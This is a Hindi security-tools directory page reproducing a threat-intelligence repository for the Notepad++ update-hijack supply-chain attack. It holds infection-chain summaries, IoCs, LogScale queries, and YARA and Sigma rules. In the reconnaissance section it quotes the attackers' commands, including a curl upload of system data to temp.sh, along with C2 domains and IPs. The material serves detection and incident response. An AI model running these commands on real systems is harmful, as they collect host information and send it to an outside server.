Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
notepadpp-supply-chain-iocs — Notepad++ आपूर्ति श्रृंखला हमले (CVE-2025-15556) — Lotus Blossom APT, जून–दिसंबर 2025 के लिए IoCs और डिटेक्शन नियम। इसमें Falcon LogScale क्वेरी, YARA/Sigma नियम और MITRE ATT&CK मैपिंग शामिल है। | Kitploit
उपकरण/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
समझौता संकेतक (IOC) प्रबंधनखतरा फ़ीड और एग्रीगेटरभेद्यता विश्लेषणफोरेंसिकमालवेयर विश्लेषणखतरा खुफियाआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षाघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

Notepad++ आपूर्ति श्रृंखला हमले (CVE-2025-15556) — Lotus Blossom APT, जून–दिसंबर 2025 के लिए IoCs और डिटेक्शन नियम। इसमें Falcon LogScale क्वेरी, YARA/Sigma नियम और MITRE ATT&CK मैपिंग शामिल है।

रिपॉजिटरी देखें
147 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

Notepad++ आपूर्ति श्रृंखला हमला — IoC भंडार

CVE-2025-15556 | लोटस ब्लॉसम / रास्पबेरी टाइफून | जून – दिसंबर 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


अवलोकन

इस भंडार में Notepad++ आपूर्ति श्रृंखला हमले (जिसका खुलासा 2 फरवरी, 2026 को हुआ) से संबंधित समझौता संकेतकों (IoCs) का एक व्यापक, एकीकृत संग्रह है।

जून से दिसंबर 2025 के बीच, एक चीनी राज्य-प्रायोजित खतरा अभिनेता ने Notepad++ की होस्टिंग बुनियादी ढांचे से समझौता किया, अंतर्निहित अपडेट तंत्र (WinGUp) को हाईजैक करके लक्षित उपयोगकर्ताओं को चुनिंदा रूप से ट्रोजनाइज्ड इंस्टॉलर वितरित किए। हमले ने अपडेटर (पूर्व-8.8.9) में क्रिप्टोग्राफ़िक सत्यापन की कमी का फायदा उठाया, जिससे कस्टम बैकडोर, Cobalt Strike Beacons और Metasploit पेलोड का वितरण संभव हुआ।

मुख्य तथ्य


संक्रमण श्रृंखलाएं

Kaspersky GReAT ने तीन अलग-अलग संक्रमण श्रृंखलाओं की पहचान की, जिन्हें पता लगाने से बचने के लिए लगभग मासिक रूप से घुमाया गया:

श्रृंखला #1 — जुलाई/अगस्त 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → ProShow.exe (वैध) → "load" फ़ाइल के माध्यम से शोषण
  → Metasploit डाउनलोडर → Cobalt Strike Beacon
  • DLL साइडलोडिंग के बजाय ProShow सॉफ्टवेयर में एक पुरानी कमजोरी का दुरुपयोग करता है
  • टोही: whoami && tasklist → temp.sh के माध्यम से बाहर निकाली गई
  • कार्यशील निर्देशिका: %appdata%\ProShow\

श्रृंखला #2 — सितंबर/अक्टूबर 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → script.exe (Lua दुभाषिया) → alien.ini (संकलित Lua)
  → EnumWindowStationsW के माध्यम से शेलकोड → Metasploit डाउनलोडर → Cobalt Strike Beacon
  • संकलित शेलकोड को निष्पादित करने के लिए एक वैध Lua दुभाषिया का उपयोग करता है
  • विस्तारित टोही: whoami && tasklist && systeminfo && netstat -ano
  • कार्यशील निर्देशिका: %appdata%\Adobe\Scripts\

श्रृंखला #3 — अक्टूबर 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → BluetoothService.exe (वैध) → log.dll (साइडलोडेड)
  → "BluetoothService" शेलकोड को डिक्रिप्ट करता है → क्रिसालिस बैकडोर
  • क्लासिक DLL साइडलोडिंग तकनीक
  • कोई अंतर्निहित टोही नहीं (श्रृंखला 1 और 2 के विपरीत)
  • कार्यशील निर्देशिका: %appdata%\Bluetooth\
  • संबद्ध Cobalt Strike Beacon C:\ProgramData\USOShared\ में पाया गया
root@kitploit:~
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

भंडार सामग्री

फ़ाइलविवरण
notepadpp_supply_chain_iocs.csvपूर्ण IoC डेटासेट (105 संकेतक) MITRE ATT&CK मैपिंग के साथ

CSV स्कीमा


पता लगाना और खतरे की खोज

प्राथमिकता संकेतक (यहां से शुरू करें)

व्यवहारिक — IoC-अज्ञेय, उच्चतम मूल्य:

  • gup.exe एक वैध हस्ताक्षरित Notepad++ इंस्टॉलर के अलावा कोई भी चाइल्ड प्रक्रिया बनाता है
  • gup.exe notepad-plus-plus.org, github.com, release-assets.githubusercontent.com के अलावा अन्य डोमेन/IP से कनेक्ट होता है
  • निर्देशिकाओं का निर्माण: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • %localappdata%\Temp\ns.tmp\ का निर्माण (NSIS रनटाइम — सभी श्रृंखलाओं में मौजूद)

नेटवर्क — उच्च विश्वास:

  • cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com का DNS समाधान
  • temp.sh (51.91.79.17) से कनेक्शन — विशेष रूप से curl के माध्यम से फ़ाइल अपलोड के साथ
  • User-Agent हेडर में temp.sh URL एम्बेडेड HTTP अनुरोध
  • 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210 पर आउटबाउंड कनेक्शन

टोही कमांड (पोस्ट-एक्सप्लॉइटेशन):

root@kitploit:~
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

CrowdStrike Falcon LogScale क्वेरीज़

व्यवहारिक: GUP.exe चाइल्ड प्रक्रिया खोज
root@kitploit:~
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
प्रक्रिया, नेटवर्क और DNS घटनाओं में मल्टी-IoC खोज
root@kitploit:~
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // दुर्भावनापूर्ण IP
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // दुर्भावनापूर्ण डोमेन
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // संदिग्ध फ़ाइल नाम
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // संदिग्ध DLL
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // श्रृंखला-विशिष्ट कलाकृतियां
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
NSIS इंस्टॉलर का पता लगाना (सभी श्रृंखलाएं)
root@kitploit:~
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

YARA नियम (NSIS + टोही पैटर्न)

दुर्भावनापूर्ण NSIS अपडेटर के लिए YARA नियम
root@kitploit:~
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Detects malicious NSIS installers from Notepad++ supply chain attack"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Sigma नियम

Sigma: GUP.exe संदिग्ध चाइल्ड प्रक्रिया
root@kitploit:~
title: Notepad++ GUP.exe Suspicious Child Process
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects GUP.exe (Notepad++ updater) spawning suspicious child processes indicative of supply chain compromise
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.initial_access
    - attack.t1195.002
    - cve.2025.15556
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\gup.exe'
    filter_legitimate:
        Image|endswith:
            - '\npp.Installer.x64.exe'
            - '\npp.Installer.exe'
    condition: selection_parent and not filter_legitimate
falsepositives:
    - Legitimate Notepad++ installers with non-standard naming
level: high
Sigma: temp.sh के माध्यम से टोही डेटा बहिर्गमन
root@kitploit:~
title: Reconnaissance Data Exfiltration via temp.sh
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Detects system reconnaissance followed by data upload to temp.sh, as observed in Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
tags:
    - attack.exfiltration
    - attack.t1567
    - attack.discovery
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        CommandLine|contains:
            - 'temp.sh/upload'
            - 'temp.sh'
        Image|endswith: '\curl.exe'
    condition: selection_curl
falsepositives:
    - Legitimate use of temp.sh file sharing service (rare in corporate environments)
level: high
Sigma: दुर्भावनापूर्ण डोमेन समाधान
root@kitploit:~
title: Notepad++ Supply Chain C2 Domain Resolution
id: c3d4e5f6-a7b8-9012-cdef-123456789012
status: experimental
description: Detects DNS resolution of C2 domains associated with the Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - 'cdncheck.it.com'
            - 'safe-dns.it.com'
            - 'self-dns.it.com'
            - 'api.skycloudcenter.com'
            - 'api.wiresguard.com'
    condition: selection
falsepositives:
    - Very unlikely in corporate environments
level: critical

MITRE ATT&CK मैपिंग


संदर्भ


तत्काल कार्रवाइयां

  1. पहचानें Notepad++ (कोई भी संस्करण < 8.9.1) स्थापित सभी एंडपॉइंट्स
  2. शिकार करें gup.exe के लिए जिसने जून–दिसंबर 2025 के बीच अप्रत्याशित चाइल्ड प्रक्रियाएं शुरू कीं
  3. खोजें ऊपर सूचीबद्ध C2 डोमेन और IP से कनेक्शन के लिए नेटवर्क लॉग
  4. जांचें फ़ाइल सिस्टम कलाकृतियों (%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\) के लिए
  5. अपडेट करें Notepad++ को v8.9.1+ में आधिकारिक GitHub रिलीज़ से मैन्युअल रूप से डाउनलोड किए गए इंस्टॉलर का उपयोग करके
  6. हटाएं पिछले Notepad++ संस्करणों द्वारा स्थापित कोई भी पुराने कस्टम रूट प्रमाणपत्र
  7. अलग करें और सकारात्मक संकेतक दिखाने वाले किसी भी एंडपॉइंट का ट्राइएज करें

परिवर्तन लॉग

तिथिपरिवर्तन
2026-02-09प्रारंभिक रिलीज़ — Kaspersky, Rapid7, CrowdStrike, Tenable से 105 IoCs एकीकृत

लाइसेंस

यह भंडार MIT लाइसेंस के तहत प्रदान किया गया है। IoCs केवल रक्षात्मक उद्देश्यों के लिए सार्वजनिक स्रोतों से एकत्र किए गए हैं।


योगदान

योगदान का स्वागत है। यदि आपके पास अतिरिक्त IoCs, पता लगाने के नियम या सुधार हैं:

  1. भंडार को फोर्क करें
  2. CSV में अपने संकेतक जोड़ें (स्कीमा बनाए रखते हुए)
  3. स्रोत के संदर्भ के साथ एक पुल अनुरोध सबमिट करें

अस्वीकरण: यह भंडार केवल रक्षात्मक साइबर सुरक्षा उद्देश्यों के लिए है। IoCs और पता लगाने के नियम संगठनों को इस आपूर्ति श्रृंखला समझौते के प्रति अपने जोखिम का आकलन करने में मदद करने के लिए यथावत प्रदान किए गए हैं।

टूल डाउनलोड करें
CVECVE-2025-15556 — अखंडता जांच के बिना कोड का डाउनलोड
खतरा अभिनेतालोटस ब्लॉसम (बिलबग, रास्पबेरी टाइफून, थ्रिप) / जिर्कोनियम (वायलेट टाइफून)
सक्रिय अवधिजून 2025 – 2 दिसंबर, 2025
हमला वेक्टरWinGUp ऑटो-अपडेटर के माध्यम से आपूर्ति श्रृंखला समझौता
लक्ष्यसरकार, दूरसंचार, वित्तीय सेवाएं, IT प्रदाता (फिलीपींस, वियतनाम, अल साल्वाडोर, ऑस्ट्रेलिया, पूर्वी एशिया)
मैलवेयरक्रिसालिस बैकडोर (कस्टम), Cobalt Strike Beacon, Metasploit Meterpreter
पैच किया गयाNotepad++ v8.8.9+ (प्रमाणपत्र सत्यापन) / v8.9.1+ (XMLDSig सत्यापन)
कॉलमविवरण
ioc_typeप्रकार: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueसंकेतक मान
chainसंक्रमण श्रृंखला (1, 2, 3, 1/2, 2/3, all, n/a)
contextIoC क्या दर्शाता है, इसका विवरण
sourceखुफिया स्रोत (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskगंभीरता (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueMITRE ATT&CK तकनीक ID
रणनीतितकनीकIDइस अभियान में उपयोग
प्रारंभिक पहुंचआपूर्ति श्रृंखला समझौता: सॉफ्टवेयर आपूर्ति श्रृंखला से समझौताT1195.002WinGUp अपडेट तंत्र को हाईजैक किया गया
निष्पादनकमांड और स्क्रिप्टिंग दुभाषिया: विंडोज कमांड शेलT1059.003cmd.exe के माध्यम से टोही
निष्पादनकमांड और स्क्रिप्टिंग दुभाषिया: Python/LuaT1059.006श्रृंखला #2 Lua दुभाषिया
निष्पादनक्लाइंट निष्पादन के लिए शोषणT1203श्रृंखला #1 ProShow कमजोरी
निष्पादनमूल APIT1106शेलकोड निष्पादन के लिए EnumWindowStationsW
स्थायित्वनिष्पादन प्रवाह हाईजैक: DLL साइड-लोडिंगT1574.002श्रृंखला #3 log.dll साइडलोडिंग
रक्षा चोरीअस्पष्ट फ़ाइलें या जानकारीT1027एन्क्रिप्टेड शेलकोड, XOR कुंजी "CRAZY"
रक्षा चोरीछलावरण: वैध नाम से मिलानT1036.005BluetoothService.exe, update.exe, AutoUpdater.exe
खोजसिस्टम सूचना खोजT1082whoami, systeminfo, tasklist, netstat
संग्रहडेटा मंचित: स्थानीय डेटा स्टेजिंगT1074.001टोही आउटपुट .txt फ़ाइलों में सहेजा गया
कमांड और नियंत्रणएप्लिकेशन लेयर प्रोटोकॉल: वेब प्रोटोकॉलT1071.001Cobalt Strike, क्रिसालिस के माध्यम से HTTPS C2
कमांड और नियंत्रणएन्क्रिप्टेड चैनलT1573CS Beacon एन्क्रिप्टेड कॉन्फ़िगरेशन
कमांड और नियंत्रणइनग्रेस टूल ट्रांसफरT1105Metasploit डाउनलोडर CS Beacon ला रहा है
बहिर्गमनवेब सेवा पर बहिर्गमनT1567temp.sh पर अपलोड
स्रोतलिंक
Kaspersky GReAT — अनजान निष्पादन श्रृंखलाएं और नए IoCssecurelist.com
Rapid7 — क्रिसालिस बैकडोर: लोटस ब्लॉसम के टूलकिट में गोताrapid7.com
Notepad++ आधिकारिक खुलासा — हाईजैक की गई घटना की जानकारी अपडेटnotepad-plus-plus.org
Kevin Beaumont — प्रारंभिक खुलासा और आरोपणDoublePulsar
Tenable — Notepad++ आपूर्ति श्रृंखला समझौते के बारे में अक्सर पूछे जाने वाले प्रश्नtenable.com
Orca Security — अपडेट हाईजैक विश्लेषण और सुधारorca.security
CSO Online — चीनी APT परिष्कृत आपूर्ति श्रृंखला हमलाcsoonline.com